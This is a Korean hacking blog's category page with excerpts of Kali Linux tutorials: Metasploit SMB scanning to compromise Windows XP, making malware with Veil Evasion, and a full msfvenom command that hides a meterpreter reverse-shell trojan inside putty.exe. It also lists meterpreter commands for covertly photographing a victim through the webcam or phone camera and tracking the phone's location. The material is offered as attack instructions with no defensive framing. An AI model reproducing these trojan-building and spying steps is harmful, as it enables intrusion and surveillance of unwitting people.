본문 바로가기

2. 시스템 해킹 및 모의 해킹/Kali Linux13

SMB 타겟 스캐닝 및 해당 취약점으로 윈 xp 해킹 SMB-Server Message Block 으로 윈도우의 해킹 취약점중 하나입니다. MSF를 사용하여 SMB 취약점을 스캐닝하고 해당 취약부분으로 해킹이 가능해집니다. [사용법 및 명령어] service postgresql start msfconsole use scanner/smb/smb_version - smb_version 모듈을 사용해 스캐닝합니다. show options를 이용해서 설정할 옵션들을 확인합니다. set rhosts [스캐닝할 네트워크 범위] - remote host를 스캐닝합니다. ex)192.168.0.0/24 는 192.168.0 네트워크를 스캐닝한다는 의미이겠죠? set threads 40 - 사양에 따라 숫자를 맞추시면 됩니다. 높을수록 스캐닝이 빨라집니다. 사양이 낮으면 .. 2023. 12. 27.
Veil Evasion 악성코드 만들기 + rdesktop 원격조종 Veil Evasion은 Veil 프레임워크에서 사용할수 있는 악성코드 제작 도구입니다. https://github.com/Veil-Framework/Veil GitHub - Veil-Framework/Veil: Veil 3.1.X (Check version info in Veil at runtime) Veil 3.1.X (Check version info in Veil at runtime) - GitHub - Veil-Framework/Veil: Veil 3.1.X (Check version info in Veil at runtime) github.com 위 페이지에서 git clone으로 받아서 사용하시면 됩니다. [명령어 및 사용법] Veil 폴더에 가서 ./Veil.py로 실행 >use 1 - E.. 2023. 12. 27.
putty.exe 안에 트로이목마 넣기 우선적으로 윈도우의 putty.exe 실행파일을 칼리리눅스에 넣어줍니다. 그 후 다음 명령을 사용합니다. msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.0.8 lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o fakeputty.exe -a : 아키텍트 - x86 -x : putty.exe를 사용하겠다 -k : 오리지날 putty.exe를 keep 하겠다. -e : 인코딩 -i : 반복을 한다는것 인코딩을 3번 반복 -b : 인코딩할때 무시할 문자 -f : 파일 확장자 exe -o : output 실질적으로는 putty 뿐.. 2023. 12. 27.
msfconsole 명령어 정리 - 핸드폰 위치추적 , 웹캠스냅[폰카메라 유출하기] sessions -i 로 세션을 잡은 상태에서 사용합니다. ->webcam_snap - 대상이 데스크톱이나 노트북이면 웹캠, 스마트폰이면 폰카를 잡아서 강제 촬영시키고 캡처본을 해커에게 보냅니다. ->geolocate - 대상 핸드폰의 위치를 위도 경도 정보를 보내주므로 구글맵에서 확인하면 위치 추적이 된다. 2023. 12. 27.